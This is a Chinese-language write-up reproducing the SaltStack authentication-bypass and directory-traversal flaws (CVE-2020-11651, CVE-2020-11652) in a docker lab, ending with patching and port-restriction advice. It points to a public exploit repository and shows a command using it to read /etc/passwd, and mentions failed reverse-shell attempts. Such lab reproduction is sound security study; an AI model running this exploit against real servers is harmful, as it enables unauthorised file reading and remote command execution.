SaltStack遠程命令執行漏洞復現(CVE-2020-11651、CVE-2020-11652)


0x00 概述

SaltStack是基於Python開發的一套C/S架構配置管理工具,是一個服務器基礎架構集中化管理平台,具備配置管理、遠程執行、監控等功能。

前段時間,國外某安全團隊披露了SaltStack存在認證繞過漏洞(CVE-2020-11651)和目錄遍歷漏洞(CVE-2020-11652)。

在CVE-2020-11651認證繞過漏洞中,攻擊者通過構造惡意請求,可以繞過Salt Master的驗證邏輯,調用相關未授權函數功能,從而可以造成遠程命令執行漏洞。

在CVE-2020-11652目錄遍歷漏洞中,攻擊者通過構造惡意請求,讀取服務器上任意文件。

 

0x01 影響版本

SaltStack < 2019.2.4

SaltStack < 3000.2

 

0x02 環境搭建 

 使用docker搭建環境

1.拉取鏡像

docker pull vulfocus/saltstack-cve_2020_11651

2.運行環境

docker run -d -p 4506:4506 -p 4505:4505 vulfocus/saltstack-cve_2020_11651

環境搭建成功

 

0x03 漏洞復現

 github上公開exp很多,選擇一個下載即可

https://github.com/Imanfeng/SaltStack-Exp.git

1.讀取/etc/passwd文件

python3 exp.py  --master 192.168.217.131 --read /etc/passwd

 

 2.反彈shell

嘗試很多辦法,換了POC嘗試反彈shell,但是都沒有成功

今天看到一篇文章,當受害主機中沒有nc的情況,使用msfvenom生成木馬文件,使用msf建立會話,嘗試后仍然無果,后續再行研究

 

0x03 修復方案

1. 將SaltStack升級至安全版本以上,升級前建議做好快照備份。

2. 設置SaltStack為自動更新,及時獲取相應補丁。

3. 將Salt Master默認監聽端口(默認4505 和 4506)設置為禁止對公網開放,或僅對可信對象開放。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM